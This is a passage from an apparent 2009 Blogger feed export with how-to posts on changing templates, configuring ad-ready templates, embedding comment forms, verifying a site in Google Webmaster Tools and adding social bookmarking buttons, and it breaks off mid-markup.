style="font-weight: bold;"&gt;Step IV -&lt;/span&gt; Now click on the &lt;span style="font-weight: bold;"&gt;Browse&lt;/span&gt; tab , just below it. Select the your favourite Template file (always with &lt;span style="font-weight: bold;"&gt;.xml&lt;/span&gt; extension) and press &lt;span style="font-weight: bold;"&gt;Upload&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Step V - &lt;/span&gt;If you are having any page elements in your old templates, the Blogger will remind you that you are about to delete them. Just click "&lt;span style="font-weight: bold;"&gt;Confirm &amp;amp; Save&lt;/span&gt;".&lt;br /&gt;&lt;br /&gt;That's it you have successfully changed your blogger template and you see how it looks by clicking "&lt;span style="font-weight: bold;"&gt;View Blog&lt;/span&gt;".&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Note :&lt;/span&gt; If you are having error with this method ,you can just copy the HTML code from New Templates .xml file and paste it in the text box at "Edit HTML" page after checking the "Expand&lt;br /&gt;Widget Templates" box ,instead of &lt;span style="font-weight: bold;"&gt;Step IV.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-7905397393405225040?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/7905397393405225040/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=7905397393405225040' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/7905397393405225040'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/7905397393405225040'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/how-to-change-your-blogger-template.html' title='How to change your Blogger Template ?'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-2659286474991691059</id><published>2009-07-26T10:16:00.023-07:00</published><updated>2009-07-26T10:16:11.818-07:00</updated><title type='text'>Beautiful 3 column Blogger Template - Passion Duo</title><content type='html'>Here are some beautiful and modern Web 2.0 templates for the Blogger having 3 columns which I got from - &lt;a href="http://www.eblogtemplates.com/"&gt;eBlog Templates&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;1. Passion Duo Red Template.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_tbHfaj1A058/SH90wsoSkoI/AAAAAAAAEAE/PlkQvmVD8RY/s1600-h/passionduo-blogger-med.jpg"&gt;&lt;img style="cursor: pointer;" src="http://bp1.blogger.com/_tbHfaj1A058/SH90wsoSkoI/AAAAAAAAEAE/PlkQvmVD8RY/s400/passionduo-blogger-med.jpg" alt="" id="BLOGGER_PHOTO_ID_5224022472735756930" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;a href="http://passionduo-blogger.blogspot.com/"&gt;Live Demo&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://drraman007.googlepages.com/passionduo-red-blogger.zip"&gt;Download&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;2. Passion Duo Blue Template.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp3.blogger.com/_tbHfaj1A058/SH90wleswoI/AAAAAAAAEAM/WKseGRVS9MA/s1600-h/passionduo-blue-blogger-med.jpg"&gt;&lt;img style="cursor: pointer;" src="http://bp3.blogger.com/_tbHfaj1A058/SH90wleswoI/AAAAAAAAEAM/WKseGRVS9MA/s400/passionduo-blue-blogger-med.jpg" alt="" id="BLOGGER_PHOTO_ID_5224022470816481922" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;a href="http://passionduo-blue.blogspot.com/"&gt;Live Demo&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://drraman007.googlepages.com/passionduo-blue-blogger.zip"&gt;Download&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;3. Passion Duo Green Template.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp0.blogger.com/_tbHfaj1A058/SH90w93Ak0I/AAAAAAAAEAU/I0q68kCB8Xk/s1600-h/passionduo-green-blogger-med.gif"&gt;&lt;img style="cursor: pointer;" src="http://bp0.blogger.com/_tbHfaj1A058/SH90w93Ak0I/AAAAAAAAEAU/I0q68kCB8Xk/s400/passionduo-green-blogger-med.gif" alt="" id="BLOGGER_PHOTO_ID_5224022477360894786" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;a href="http://passionduo-green.blogspot.com/"&gt;Live Demo&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://drraman007.googlepages.com/passionduo-green-blogger.zip"&gt;Download&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;These are the modern money making templates for your Blogger Blog.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Features - &lt;/span&gt;&lt;br /&gt;&lt;ol&gt;&lt;li&gt;Modern Web 2.0 design.&lt;/li&gt;&lt;li&gt;Bulit-in adspaces - &lt;span id="the-content"&gt;468 x 60 banner spot in the header, six 125 x 125 banner spots in the right sidebar, and plenty of other sidebar spots for skyscraper banners.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span id="the-content"&gt;Recent Posts widget.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span id="the-content"&gt;Recent Comments widget.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span id="the-content"&gt;Feedjit (real time visitor widget).&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span id="the-content"&gt;Fonts &amp;amp; Colors functionality - enables you to change the color and font using the built-in section in Blogger.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span id="the-content"&gt;Built-in Top Tabs or Navigation Bar.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span id="the-content"&gt;Built-in RSS feed icon.&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;Now let's configure these templates for your blog.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Goto&lt;/span&gt; - Dashboard &gt; Layout &gt; Edit HTML &gt; Expand Widget Templates.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;" id="the-content"&gt;1. 468 x 60 header banner -&lt;br /&gt;&lt;/span&gt;&lt;span id="the-content"&gt;Search  for &lt;/span&gt;&lt;span id="the-content"&gt;&lt;blockquote&gt;&lt;!-- Delete or replace with your ad --&gt;&amp;lt;!-- Delete or replace with your ad --&amp;gt;&lt;/blockquote&gt; and place your ads code between this tag and &lt;blockquote&gt;&amp;lt;!-- End ad --&amp;gt;&lt;/blockquote&gt; tag.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;2. &lt;/span&gt;&lt;span style="font-weight: bold;" id="the-content"&gt;468 x 60 Google ad above Posts -&lt;br /&gt;&lt;/span&gt;&lt;span id="the-content"&gt;Search for -  &lt;blockquote&gt;&amp;lt;div id="'ga-ads'"&amp;gt;&lt;/blockquote&gt;  and place your google ads code afters parsing between this tag and &lt;blockquote&gt;&amp;lt;/div&amp;gt;&lt;/blockquote&gt; tag.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;3. &lt;/span&gt;&lt;/span&gt;&lt;span id="the-content"&gt;&lt;span style="font-weight: bold;"&gt;125 x 125 banner ads -&lt;/span&gt;&lt;br /&gt;Find &lt;blockquote&gt;&amp;lt;!-- Replace with your ads --&amp;gt;&lt;/blockquote&gt; and below this code,add your ads code between  &lt;blockquote&gt;&amp;lt;li&amp;gt; and &amp;lt;/li&amp;gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;4. For the top tabs&lt;/span&gt; goto - Dashboard &gt; Layout &gt; Page Elements. Click on edit button on widget named "Tabs" in the header and add your links and save.&lt;br /&gt;&lt;br /&gt;That's it you have successfully configured the template to fit your blog now just start posting and making money from your blog.&lt;br /&gt;&lt;/span&gt;&lt;span id="the-content"&gt;&lt;code&gt;&lt;!-- Replace with your ads --&gt;&lt;/code&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-2659286474991691059?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/2659286474991691059/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=2659286474991691059' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/2659286474991691059'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/2659286474991691059'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/beautiful-3-column-blogger-template.html' title='Beautiful 3 column Blogger Template - Passion Duo'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp1.blogger.com/_tbHfaj1A058/SH90wsoSkoI/AAAAAAAAEAE/PlkQvmVD8RY/s72-c/passionduo-blogger-med.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-2097706721289597887</id><published>2009-07-26T10:16:00.021-07:00</published><updated>2009-07-26T10:16:10.658-07:00</updated><title type='text'>Blogger Templates</title><content type='html'>&lt;div style="text-align: justify;"&gt;Here I've some nice collection of Blogger Templates which I would like to share with you people.&lt;br /&gt;&lt;br /&gt;But before this you may like to know - &lt;a href="http://free-blogger-help.blogspot.com/2008/07/how-to-change-your-blogger-template.html"&gt;How to change your Blogger Template&lt;/a&gt; ?&lt;br /&gt;&lt;br /&gt;Please select the category of the Blogger Template you want -&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;a dir="ltr" href="http://free-blogger-help.blogspot.com/search/label/4%20Column%20Templates?max-results=2"&gt; 1 Column Blogger Templates &lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://free-blogger-help.blogspot.com/search/label/2%20Column%20Templates"&gt;2 Column Blogger Templates&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://free-blogger-help.blogspot.com/search/label/3%20Column%20Templates"&gt;3 Column Blogger Templates&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a dir="ltr" href="http://free-blogger-help.blogspot.com/search/label/4%20Column%20Templates?max-results=2"&gt;4 Column Blogger Templates &lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;Also if you have any difficulty in changing your Blogger template or want to customize your Template , just post a comment here in this post or in respected template's post.&lt;br /&gt;&lt;br /&gt;If you have installed the templates successfully and want to show your appreciation,please do not remove the links in the footer. These guys have really done hard work to prepare those templates , just show your appreciation by keeping the footer links.&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-2097706721289597887?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/2097706721289597887/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=2097706721289597887' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/2097706721289597887'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/2097706721289597887'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/blogger-templates.html' title='Blogger Templates'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-3480288076080316303</id><published>2009-07-26T10:16:00.019-07:00</published><updated>2009-07-26T10:16:09.751-07:00</updated><title type='text'>How to add an Embedded Comments Form in posts in Blogger.</title><content type='html'>Many people using Blogger were not happy with the comments form available with blogger,which opens on the seperate page.There have been a long-time demand for a comment form embedded in the posts like the one in Wordpress.&lt;br /&gt;&lt;br /&gt;At last Blogger have accepted the request and have developed an Embedded Comments Form.&lt;br /&gt;&lt;br /&gt;Open this url - &lt;a href="http://draft.blogger.com"&gt;http://draft.blogger.com&lt;/a&gt;/ and log into your account using your Blogger id/password.&lt;br /&gt;&lt;br /&gt;Go to - Settings &gt; Comments&lt;br /&gt;&lt;br /&gt;Scroll down till you see - "Comment Form Placement"&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_ePNaPx__W9w/SGO2Rno-pFI/AAAAAAAAAUM/sWwZlaeWqAM/s320-R/comment-form-placement.png"&gt;&lt;img style="cursor: pointer; width: 400px;" src="http://bp1.blogger.com/_ePNaPx__W9w/SGO2Rno-pFI/AAAAAAAAAUM/sWwZlaeWqAM/s320-R/comment-form-placement.png" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Check the box in front of "Embedded below post" and save it.&lt;br /&gt;&lt;br /&gt;Now check any of your blog's post, whether you get the form like I am having here.&lt;br /&gt;&lt;br /&gt;If not , go to Layout &gt; Edit HTML &gt; Expand Widget Templates and search this -&lt;br /&gt;&lt;blockquote&gt;&amp;lt;b:include data='post' name='comments' /&amp;gt;&lt;/blockquote&gt;And immediately after this add the following code -&lt;br /&gt;&lt;blockquote&gt;&amp;lt;b:include data='post' name='comment-form'/&amp;gt;&lt;/blockquote&gt;Now check your post once againg,it will be showing the comments form embedded in the posts.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-3480288076080316303?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/3480288076080316303/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=3480288076080316303' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/3480288076080316303'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/3480288076080316303'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/how-to-add-embedded-comments-form-in.html' title='How to add an Embedded Comments Form in posts in Blogger.'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp1.blogger.com/_ePNaPx__W9w/SGO2Rno-pFI/AAAAAAAAAUM/sWwZlaeWqAM/s72-Rc/comment-form-placement.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-2940840649231704529</id><published>2009-07-26T10:16:00.017-07:00</published><updated>2009-07-26T10:16:08.847-07:00</updated><title type='text'>Increase traffic to your Blogger blog with Google Webmaster Tools</title><content type='html'>Google the biggest search engine on the web , and you can get your blog indexed at Google Search Engine by using &lt;a href="https://www.google.com/webmasters/tools/"&gt;Google Webmaster's Tools.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;You can use these Webmaster's Tools using your Google Account.Just visit the link above after you have logged into your blogger account.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_tbHfaj1A058/SITOBWAiQXI/AAAAAAAAECU/782vzcf49aY/s1600-h/webmasters.PNG"&gt;&lt;img style="cursor: pointer;" src="http://bp1.blogger.com/_tbHfaj1A058/SITOBWAiQXI/AAAAAAAAECU/782vzcf49aY/s400/webmasters.PNG" alt="" id="BLOGGER_PHOTO_ID_5225527990139634034" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Just add you blog's URL in the "Click here to add site box" and press "Add Site".&lt;br /&gt;&lt;br /&gt;Next Step is to verify your blog.&lt;br /&gt;&lt;br /&gt;In the "Choose Verification Method" box,select "Add a meta tag".&lt;br /&gt;&lt;br /&gt;Now you will get a code looking like this-&lt;br /&gt;&lt;blockquote&gt;&amp;lt;meta name="verify-v1" content="4m13erZoSX4XyeWw/nNxYTtr+ONIzBy8ZnOMT1TDtuM=" /&amp;gt;&lt;/blockquote&gt;Copy this code and goto your Blogger's-&lt;br /&gt;&lt;br /&gt;Dashboard &gt; Layout &gt; Edit HTML.&lt;br /&gt;&lt;br /&gt;Look for this tag - "&amp;lt;head&amp;gt;" and place the code below this tag. and click "Save Template"&lt;br /&gt;&lt;br /&gt;Now in your Webmaster's Tools page click the verify button and yoy will see a page saying your site is verified.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Adding Blogger Blog's Sitemap to Google Webmaster's Tools.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Now this is the important step and also quite difficult if you donot know how to create a sitemap for your Blogger Blog.&lt;br /&gt;&lt;br /&gt;Now just goto your Google Webmaster's Tools Dashboard and click on add option below sitemap.&lt;br /&gt;&lt;br /&gt;It will ask you to choose type .... select "Add General Web Sitemap"&lt;br /&gt;&lt;br /&gt;Now just add "atom.xml" besides your blog address like this -&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;http://yourblog.blogspot.com/&lt;span style="color: rgb(0, 153, 0);"&gt;atom.xml&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Click "Add General Web Sitemap" and your sitemap is added to Google without anymore hassels.&lt;br /&gt;&lt;br /&gt;By submitting your sitemap to Google you tell the Google Search Engine more about your blog,the pages it's having and it's content,helping you index more pages from your Blogger blog into Google Search Results, ultimately getting you more visitors.&lt;br /&gt;&lt;br /&gt;As this a feed sitemap you need  not update it manually, it will get updated automattically whenever you make new posts.&lt;br /&gt;&lt;br /&gt;How to check whether your site is indexed in Google Search Engine or not ?&lt;br /&gt;&lt;br /&gt;Here is a simple method - goto &lt;a href="http://www.google.com/"&gt;Google.com&lt;/a&gt; and search for "site:YOURBLOG.blogspot.com" and you can know whether your site is indexed in Google or not and if it's indexed then how many pages are indexed in Google Search Engine.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-2940840649231704529?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/2940840649231704529/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=2940840649231704529' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/2940840649231704529'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/2940840649231704529'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/increase-traffic-to-your-blogger-blog.html' title='Increase traffic to your Blogger blog with Google Webmaster Tools'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp1.blogger.com/_tbHfaj1A058/SITOBWAiQXI/AAAAAAAAECU/782vzcf49aY/s72-c/webmasters.PNG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-6167881201298113312</id><published>2009-07-26T10:16:00.015-07:00</published><updated>2009-07-26T10:16:07.872-07:00</updated><title type='text'>How to add Social Bookmarks Buttons/Icons after every post in Blogger?</title><content type='html'>At many blogs you have seen the social bookmarking buttons, which by one-click submit your article to the Social Bookmarking sites like - digg , del.icio.us , stumbleupon , yahoo , google , furl , etc.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;How does the Social Bookmarking helps ?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;By adding these social bookmarking buttons/icons, either you or any of your reader can submit your article to these sites. Now when your article is listed here at these sites , there is a chance that you can get some visitors of millions using these social bookmarking sites.&lt;br /&gt;&lt;br /&gt;So in addition to make your site look beautiful and professional these social bookmarking buttons/icons help you get more traffic to your site.&lt;br /&gt;&lt;br /&gt;How to add these Social Bookmarking Icons/Buttons to my Blogger Blog after each post ?&lt;br /&gt;&lt;br /&gt;Here's the step-by-step guide for you -&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;STEP I -&lt;/span&gt; Goto = Dashboard &gt; Layout &gt; Edit HTML &gt; Expand Widget Templates&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;STEP II - &lt;/span&gt;Now find this in your template -&lt;br /&gt;&lt;blockquote&gt;&amp;lt;head&amp;gt;&lt;/blockquote&gt;&lt;span style="font-weight: bold;"&gt;STEP III - &lt;/span&gt;Just add this after that tag -&lt;br /&gt;&lt;blockquote&gt;&amp;lt;script src='http://free.blogger.help.googlepages.com/socialbookmarks.js'&amp;gt;&amp;lt;/script&amp;gt;&lt;/blockquote&gt;So that it looks like this -&lt;br /&gt;&lt;blockquote&gt;&amp;lt;head&amp;gt;&amp;lt;script src='http://free.blogger.help.googlepages.com/socialbookmarks.js'&amp;gt;&amp;lt;/script&amp;gt;&lt;/blockquote&gt;&lt;span style="font-weight: bold;"&gt;STEP I V-&lt;/span&gt; Now find this in you template -&lt;br /&gt;&lt;blockquote&gt;&amp;lt;p class='post-footer-line post-footer-line-3'&amp;gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;STEP  V-&lt;/span&gt; Add the following after this line -&lt;br /&gt;&lt;blockquote&gt;&amp;lt;style type='text/css'&amp;gt;&lt;br /&gt;.bookmark img { border: 0;&lt;br /&gt;padding:0px; }&lt;br /&gt;.bookmark a:hover {&lt;br /&gt;position: relative;&lt;br /&gt;top: 1px;&lt;br /&gt;left: 1px; }&lt;br /&gt;&amp;lt;/style&amp;gt;&lt;br /&gt;&amp;lt;span class='bookmark'&amp;gt;&lt;br /&gt;&amp;lt;table align='left' border='0' cellpadding='0' width='100%'&amp;gt;&lt;br /&gt;&amp;lt;tr&amp;gt;&lt;br /&gt;&amp;lt;td style='vertical-align:middle' valign='middle' width='30%'&amp;gt;&lt;br /&gt;&amp;lt;div expr:id='"sbtxt"+data:post.id'&amp;gt;Bookmark this post&amp;lt;a style="text-decoration:none;" href="http://free-blogger-help.blogspot.com"&amp;gt;:&amp;lt;/a&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;script type='text/javascript'&amp;gt;showsbtext(&amp;amp;quot;sbtxt&amp;amp;quot; + &amp;amp;quot;&amp;lt;data:post.id/&amp;gt;&amp;amp;quot;,0)&amp;lt;/script&amp;gt;&lt;br /&gt;&amp;lt;/td&amp;gt;&lt;br /&gt;&amp;lt;td&amp;gt;&lt;br /&gt;&amp;lt;a rel="nofollow" expr:href='"http://www.stumbleupon.com/submit?url=" + data:post.url + "&amp;amp;amp;title=" + data:post.title' expr:onmouseout='"javascript:showsbtext("sbtxt" + data:post.id + "",0);"' expr:onmouseover='"javascript:showsbtext("sbtxt" + data:post.id + "",19);"' target='_blank'&amp;gt;&amp;lt;img alt='StumpleUpon' src='http://files.bloggerplugins.org/icon_sb_stumb.gif'/&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a rel="nofollow" expr:href='"http://ma.gnolia.com/bookmarklet/add?url=" + data:post.url + "&amp;amp;amp;title=" + data:post.title' expr:onmouseout='"javascript:showsbtext("sbtxt" + data:post.id + "",0);"' expr:onmouseover='"javascript:showsbtext("sbtxt" + data:post.id + "",6);"' target='_blank'&amp;gt;&amp;lt;img alt='Ma.gnolia' border='0' src='http://files.bloggerplugins.org/icon_sb_mag.gif'/&amp;gt;&amp;lt;/a&amp;gt;&lt;br /&gt;&amp;lt;a rel="nofollow" expr:href='"http://digg.com/submit?phase=3&amp;amp;amp;url=" + data:post.url' expr:onmouseout='"javascript:showsbtext("sbtxt" + data:post.id + "",0);"' expr:onmouseover='"javascript:showsbtext("sbtxt" + data:post.id + "",1);"' target='_blank'&amp;gt;&amp;lt;img alt='DiggIt!' src='http://files.bloggerplugins.org/icon_sb_dig.gif'/&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a rel="nofollow" expr:href='"http://del.icio.us/post?url=" + data:post.url + "&amp;amp;amp;title=" + data:post.title' expr:onmouseout='"javascript:showsbtext("sbtxt" + data:post.id + "",0);"' expr:onmouseover='"javascript:showsbtext("sbtxt" + data:post.id + "",2);"' target='_blank'&amp;gt;&amp;lt;img alt='Del.icio.us' src='http://files.bloggerplugins.org/icon_sb_del.gif'/&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a rel="nofollow" expr:href='"http://www.blinklist.com/index.php?Action=Blink/addblink.php&amp;amp;amp;Description=&amp;amp;amp;Url=" + data:post.url + "&amp;amp;amp;Title=" + data:post.title' expr:onmouseout='"javascript:showsbtext("sbtxt" + data:post.id + "",0);"' expr:onmouseover='"javascript:showsbtext("sbtxt" + data:post.id + "",3);"' target='_blank'&amp;gt;&amp;lt;img alt='Blinklist' src='http://files.bloggerplugins.org/icon_sb_bli.gif'/&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a rel="nofollow" expr:href='"http://myweb2.search.yahoo.com/myresults/bookmarklet?u=" + data:post.url + "&amp;amp;amp;=" + data:post.title' expr:onmouseout='"javascript:showsbtext("sbtxt" + data:post.id + "",0);"' expr:onmouseover='"javascript:showsbtext("sbtxt" + data:post.id + "",4);"' target='_blank'&amp;gt;&amp;lt;img alt='Yahoo' src='http://files.bloggerplugins.org/icon_sb_yah.gif'/&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a rel="nofollow" expr:href='"http://www.furl.net/storeIt.jsp?u=" + data:post.url + "&amp;amp;amp;t=" + data:post.title' expr:onmouseout='"javascript:showsbtext("sbtxt" + data:post.id + "",0);"' expr:onmouseover='"javascript:showsbtext("sbtxt" + data:post.id + "",8);"' target='_blank'&amp;gt;&amp;lt;img alt='Furl' src='http://files.bloggerplugins.org/icon_sb_fur.gif'/&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a rel="nofollow" expr:href='"http://www.technorati.com/cosmos/search.html?url=" + data:post.url' expr:onmouseout='"javascript:showsbtext("sbtxt" + data:post.id + "",0);"' expr:onmouseover='"javascript:showsbtext("sbtxt" + data:post.id + "",9);"' target='_blank'&amp;gt;&amp;lt;img alt='Technorati' src='http://files.bloggerplugins.org/icon_sb_tec.gif'/&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a rel="nofollow" expr:href='"http://www.simpy.com/simpy/LinkAdd.do?href=" + data:post.url + "&amp;amp;amp;title=" + data:post.title' expr:onmouseout='"javascript:showsbtext("sbtxt" + data:post.id + "",0);"' expr:onmouseover='"javascript:showsbtext("sbtxt" + data:post.id + "",10);"' target='_blank'&amp;gt;&amp;lt;img alt='Simpy' src='http://files.bloggerplugins.org/icon_sb_sim.gif'/&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a rel="nofollow" expr:href='"http://www.spurl.net/spurl.php?url=" + data:post.url + "&amp;amp;amp;title=" +  data:post.title' expr:onmouseout='"javascript:showsbtext("sbtxt" + data:post.id + "",0);"' expr:onmouseover='"javascript:showsbtext("sbtxt" + data:post.id + "",11);"' target='_blank'&amp;gt;&amp;lt;img alt='Spurl' src='http://files.bloggerplugins.org/icon_sb_spu.gif'/&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a rel="nofollow" expr:href='"http://reddit.com/submit?url=" + data:post.url + "&amp;amp;amp;title=" + data:post.title' expr:onmouseout='"javascript:showsbtext("sbtxt" + data:post.id + "",0);"' expr:onmouseover='"javascript:showsbtext("sbtxt" + data:post.id + "",17);"' target='_blank'&amp;gt;&amp;lt;img alt='Reddit' src='http://files.bloggerplugins.org/icon_sb_red.gif'/&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a rel="nofollow" 